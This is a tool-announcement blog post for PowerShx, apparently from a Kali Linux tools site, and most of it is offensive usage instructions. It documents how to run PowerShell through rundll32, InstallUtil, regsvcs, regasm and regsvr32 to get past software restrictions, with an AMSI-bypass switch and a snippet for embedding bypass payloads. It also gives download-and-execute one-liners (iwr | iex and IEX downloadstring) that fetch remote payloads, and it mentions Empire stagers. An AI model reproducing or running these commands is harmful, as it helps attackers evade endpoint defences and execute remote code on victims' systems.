Kali Linux

PowerShx : Run Powershell Without Software Restrictions

PowerShx is a rewrite and expansion on the PowerShdll project. PowerShx provide functionalities for bypassing AMSI and running PS Cmdlets.

Features

  • Run Powershell with DLLs using rundll32.exe, installutil.exe, regsvcs.exe or regasm.exe, regsvr32.exe.
  • Run Powershell without powershell.exe or powershell_ise.exe
  • AMSI Bypass features.
  • Run Powershell scripts directly from the command line or Powershell files
  • Import Powershell modules and execute Powershell Cmdlets.

Usage

.dll version

rundll32

rundll32 PowerShx.dll,main -e
rundll32 PowerShx.dll,main -f Run the script passed as argument
rundll32 PowerShx.dll,main -f -c Load a script and run a PS cmdlet
rundll32 PowerShx.dll,main -w Start an interactive console in a new window
rundll32 PowerShx.dll,main -i Start an interactive console
rundll32 PowerShx.dll,main -s Attempt to bypass AMSI
rundll32 PowerShx.dll,main -v Print Execution Output to the console

Alternatives (Credit to SubTee for these techniques):


  • x86 – C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
    x64 – C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll

  • x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShx.dll
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShx.dll

  • x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShx.dll
    x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShx.dll

  • regsvr32 /s /u PowerShx.dll –>Calls DllUnregisterServer
    regsvr32 /s PowerShx.dll –> Calls DllRegisterServer

.exe version

PowerShx.exe -i Start an interactive console
PowerShx.exe -e
PowerShx.exe -f Run the script passed as argument
PowerShx.exe -f -c Load a script and run a PS cmdlet
PowerShx.exe -s Attempt to bypass AMSI.

Embedded Payloads

Payloads can be embedded by updating the data dictionary “Common.Payloads.PayloadDict” in the “Common” project and calling it in the method PsSession.cs -> Handle() . Example: in Handle() method:

private void Handle(Options options)
{
// Pre-execution before user script
_ps.Exe(Payloads.PayloadDict[“amsi”]);
}

Examples

Run a base64 encoded script

rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(“BASE64”)) ^| iex
PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(“BASE64”)) ^| iex

Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode

Run a base64 encoded script

rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;
PowerShx.exe -e “IEX ((new-object net.webclient).downloadstring(‘http://192.168.100/payload-http’))”

Requirements

.NET 4

Download
R K

Leave a Comment
Share
Published by
R K
Tags: PowerShellPowerShxSoftware Restrictions
4 years ago

Recent Posts

How OpenClaw Works

Imagine if you had a super-powered assistant who could automatically handle all the boring, repetitive…

49 minutes ago

How to Use the Linux find Command to Locate Files Like a Pro

Managing files efficiently is a core skill for anyone working in Linux, whether you're a…

2 days ago

How to Check Open Ports in Linux Using netstat, ss, and lsof

Open ports act as communication endpoints between your Linux system and the outside world. Every…

2 days ago

Best Endpoint Monitoring Tools for 2026

Introduction In today’s cyber threat landscape, protecting endpoints such as computers, smartphones, and tablets from…

4 days ago

Best 9 Incident Response Automation Tools

Introduction In today's fast-paced cybersecurity landscape, incident response is critical to protecting businesses from cyberattacks.…

4 days ago

How AI Puts Data Security at Risk

Artificial Intelligence (AI) is changing how industries operate, automating processes, and driving new innovations. However,…

2 months ago